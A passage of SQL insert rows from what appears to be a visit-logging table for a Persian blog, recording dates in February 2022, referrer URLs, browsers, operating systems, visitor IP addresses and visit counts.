(18770,'2022-02-16','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.231.215.199','000',0,1,0),
(18771,'2022-02-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(18772,'2022-02-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18773,'2022-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(18774,'2022-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18775,'2022-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18776,'2022-02-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18777,'2022-02-16','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.244','000',0,1,0),
(18778,'2022-02-16','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','131.153.240.178','000',0,2,0),
(18779,'2022-02-16','http://ictbank.ir/blog/category/os/','Chrome','Windows','10.0',NULL,NULL,'','147.75.118.241','000',0,1,0),
(18780,'2022-02-16','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','15.206.235.52','000',0,1,0),
(18781,'2022-02-16','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','73.96.223.8','000',0,1,0),
(18782,'2022-02-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,10,0),
(18783,'2022-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,4,0),
(18784,'2022-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.240','000',0,1,0),
(18785,'2022-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(18786,'2022-02-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','93.171.140.64','000',0,5,0),
(18787,'2022-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,4,0),
(18788,'2022-02-17','https://www.google.az/','Chrome','Windows','10.0',NULL,NULL,'','185.161.227.99','000',0,1,0),
(18789,'2022-02-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(18790,'2022-02-17','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','118.126.124.7','000',0,2,0),
(18791,'2022-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.185.140.66','000',0,2,0),
(18792,'2022-02-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','122.164.138.131','000',0,1,0),
(18793,'2022-02-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','200.178.15.174','000',0,1,0),
(18794,'2022-02-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.160.92.186','000',0,1,0),
(18795,'2022-02-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','198.168.17.10','000',0,1,0),
(18796,'2022-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(18797,'2022-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(18798,'2022-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18799,'2022-02-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18800,'2022-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.52.246.96','000',0,3,0),
(18801,'2022-02-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.198.162.122','000',0,2,0),
(18802,'2022-02-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18803,'2022-02-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(18804,'2022-02-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18805,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','171.36.142.7','000',0,1,0),
(18806,'2022-02-18','https://duckduckgo.com/','Chrome','Windows','10.0',NULL,NULL,'','160.93.146.108','000',0,1,0),
(18807,'2022-02-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(18808,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','204.101.161.19','000',0,2,0),
(18809,'2022-02-18','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','211.55.188.140','000',0,1,0),
(18810,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.202.113.54','000',0,2,0),
(18811,'2022-02-18','https://www.google.com/','Safari','iOS','15.1',NULL,NULL,'','197.237.29.132','000',0,2,0),
(18812,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.21','000',0,1,0),
(18813,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.165','000',0,2,0),
(18814,'2022-02-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','212.184.114.162','000',0,1,0),
(18815,'2022-02-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.201.60.21','000',0,21,0),
(18816,'2022-02-18','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.202.106.55','000',0,2,0),
(18817,'2022-02-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','83.120.52.53','000',0,11,0),
(18818,'2022-02-18','https://www.google.com/','Safari','OS X','10.15.7',NULL,NULL,'','104.28.55.135','000',0,1,0),
(18819,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','201.157.249.178','000',0,1,0),
(18820,'2022-02-18','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.156.32','000',0,3,0),
(18821,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.37.40.115','000',0,3,0),
(18822,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.93.162','000',0,2,0),
(18823,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.93.191','000',0,2,0),
(18824,'2022-02-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','95.55.163.106','000',0,1,0),
(18825,'2022-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,2,0),
(18826,'2022-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18827,'2022-02-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18828,'2022-02-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.70.100.161','000',0,1,0),
(18829,'2022-02-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(18830,'2022-02-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.57.45','000',0,5,0),
(18831,'2022-02-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','178.120.52.244','000',0,1,0),
(18832,'2022-02-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18833,'2022-02-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.226.193','000',0,1,0),
(18834,'2022-02-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18835,'2022-02-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,2,0),
(18836,'2022-02-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(18837,'2022-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18838,'2022-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18839,'2022-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18840,'2022-02-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18841,'2022-02-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18842,'2022-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.174.10.28','000',0,1,0),
(18843,'2022-02-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(18844,'2022-02-20','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.109','000',0,5,0),
(18845,'2022-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,1,0),
(18846,'2022-02-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,3,0),
(18847,'2022-02-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18848,'2022-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.19.253.26','000',0,1,0),
(18849,'2022-02-20','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.19.253.13','000',0,1,0),
(18850,'2022-02-20','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.3.199.187','000',0,1,0),
(18851,'2022-02-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18852,'2022-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.192.166','000',0,1,0),
(18853,'2022-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(18854,'2022-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18855,'2022-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18856,'2022-02-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18857,'2022-02-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.134.144.134','000',0,1,0),
(18858,'2022-02-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','177.136.33.108','000',0,1,0),
(18859,'2022-02-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18860,'2022-02-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18861,'2022-02-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.176.93','000',0,1,0),
(18862,'2022-02-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.62.101','000',0,5,0),
(18863,'2022-02-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(18864,'2022-02-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(18865,'2022-02-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','14.207.180.190','000',0,1,0),
(18866,'2022-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.101','000',0,4,0),
(18867,'2022-02-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','5.255.101.126','000',0,1,0),
(18868,'2022-02-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','111.229.204.148','000',0,1,0),
(18869,'2022-02-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(18870,'2022-02-21','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.235.237.43','000',0,1,0),
(18871,'2022-02-21','http://www.design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','144.91.106.14','000',0,2,0),
(18872,'2022-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.135.196','000',0,1,0),
(18873,'2022-02-21','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.80.93.77','000',0,1,0),
(18874,'2022-02-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,1,0),
(18875,'2022-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(18876,'2022-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(18877,'2022-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18878,'2022-02-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18879,'2022-02-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','135.148.27.76','000',0,1,0),
(18880,'2022-02-22','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.119','000',0,1,0),
(18881,'2022-02-22','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.181','000',0,1,0),
(18882,'2022-02-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(18883,'2022-02-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,3,0),
(18884,'2022-02-22','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.172.0.156','000',0,1,0),
(18885,'2022-02-22','http://ictbank.ir/blog','Opera Mobile','Android','9',NULL,NULL,'','173.201.189.89','000',0,1,0),
(18886,'2022-02-22','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.189.37','000',0,3,0),
(18887,'2022-02-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(18888,'2022-02-22','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','20.120.33.221','000',0,4,0),
(18889,'2022-02-22','http://www.ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','144.91.106.14','000',0,2,0),
(18890,'2022-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.211.35.156','000',0,1,0),
(18891,'2022-02-22','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','69.64.55.95','000',0,14,0),
(18892,'2022-02-22','http://www.bing.com','Unknown','Unknown','Unknown',NULL,NULL,'','51.68.111.184','000',0,3,0),
(18893,'2022-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.93.191','000',0,1,0),
(18894,'2022-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.92.7.82','000',0,1,0),
(18895,'2022-02-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','160.153.155.43','000',0,1,0),
(18896,'2022-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(18897,'2022-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18898,'2022-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18899,'2022-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18900,'2022-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(18901,'2022-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(18902,'2022-02-22','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(18903,'2022-02-22','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(18904,'2022-02-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,3,0),
(18905,'2022-02-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18906,'2022-02-23','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','220.134.181.236','000',0,1,0),
(18907,'2022-02-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.173.244.133','000',0,1,0),
(18908,'2022-02-23','http://www.bing.com','Unknown','Unknown','Unknown',NULL,NULL,'','51.68.111.184','000',0,1,0),
(18909,'2022-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.212.230.144','000',0,5,0),
(18910,'2022-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,1,0),
(18911,'2022-02-23','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','185.51.214.138','000',0,1,0),
(18912,'2022-02-23','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,1,0),
(18914,'2022-02-23','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,2,0),
(18915,'2022-02-23','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.45','000',0,1,0),
(18916,'2022-02-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.198','000',0,2,0),
(18917,'2022-02-23','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(18918,'2022-02-23','http://www.ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.4.181.178','000',0,1,0),
(18919,'2022-02-23','http://www.ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.226.36','000',0,1,0),
(18920,'2022-02-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(18921,'2022-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18922,'2022-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18923,'2022-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18924,'2022-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18925,'2022-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.226.85.89','000',0,17,0),
(18926,'2022-02-23','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.20.115.118','000',0,1,0),
(18927,'2022-02-23','http://ictbank.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','95.216.187.247','000',0,1,0),
(18928,'2022-02-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18929,'2022-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,1,0),
(18930,'2022-02-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.155.251','000',0,2,0),
(18931,'2022-02-24','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.81.159.193','000',0,2,0),
(18932,'2022-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','81.17.18.60','000',0,1,0),
(18933,'2022-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.68.18.82','000',0,5,0),
(18934,'2022-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18935,'2022-02-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','217.166.135.130','000',0,1,0),
(18937,'2022-02-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','132.148.121.26','000',0,1,0),
(18938,'2022-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(18939,'2022-02-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.201.154','000',0,2,0),
(18940,'2022-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.218.77','000',0,1,0),
(18941,'2022-02-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18942,'2022-02-24','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.234','000',0,1,0),
(18943,'2022-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18944,'2022-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18945,'2022-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(18946,'2022-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18947,'2022-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18948,'2022-02-24','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','142.93.178.124','000',0,2,0),
(18949,'2022-02-24','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','195.181.168.162','000',0,1,0),
(18950,'2022-02-24','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','197.252.212.172','000',0,1,0),
(18951,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.13.127.28','000',0,1,0),
(18952,'2022-02-25','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(18953,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(18954,'2022-02-25','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','54.227.32.154','000',0,1,0),
(18955,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.254.112','000',0,1,0),
(18956,'2022-02-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(18957,'2022-02-25','http://ictbank.ir/blog/category/os/','Chrome','Windows','6.3',NULL,NULL,'','91.132.138.69','000',0,1,0),
(18958,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.76','000',0,1,0),
(18959,'2022-02-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18960,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','106.195.13.77','000',0,2,0),
(18961,'2022-02-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,3,0),
(18962,'2022-02-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18963,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.43.105.226','000',0,1,0),
(18964,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.138.27','000',0,1,0),
(18965,'2022-02-25','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.16.26','000',0,1,0),
(18966,'2022-02-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(18967,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.34.53.14','000',0,4,0),
(18968,'2022-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(18969,'2022-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.195.191','000',0,1,0),
(18970,'2022-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18971,'2022-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18972,'2022-02-25','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','103.14.35.145','000',0,1,0),
(18973,'2022-02-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.53','000',0,2,0),
(18974,'2022-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.134.150.29','000',0,1,0),
(18975,'2022-02-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(18976,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,1,0),
(18977,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.12.161.203','000',0,1,0),
(18978,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.234.135.138','000',0,2,0),
(18979,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.129.41.49','000',0,2,0),
(18980,'2022-02-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.179.252.65','000',0,1,0),
(18981,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.230.140','000',0,5,0),
(18982,'2022-02-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18983,'2022-02-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18984,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.94.9','000',0,1,0),
(18985,'2022-02-26','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.96.69.254','000',0,1,0),
(18986,'2022-02-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(18987,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','151.238.50.84','000',0,1,0),
(18988,'2022-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18989,'2022-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(18990,'2022-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18991,'2022-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18992,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.152.140.46','000',0,1,0),
(18993,'2022-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.120','000',0,1,0),
(18994,'2022-02-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(18995,'2022-02-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.26','000',0,1,0),
(18996,'2022-02-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18997,'2022-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.84.237.6','000',0,1,0),
(18998,'2022-02-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.154.255.147','000',0,1,0),
(18999,'2022-02-27','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(19000,'2022-02-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','193.111.199.113','000',0,1,0),
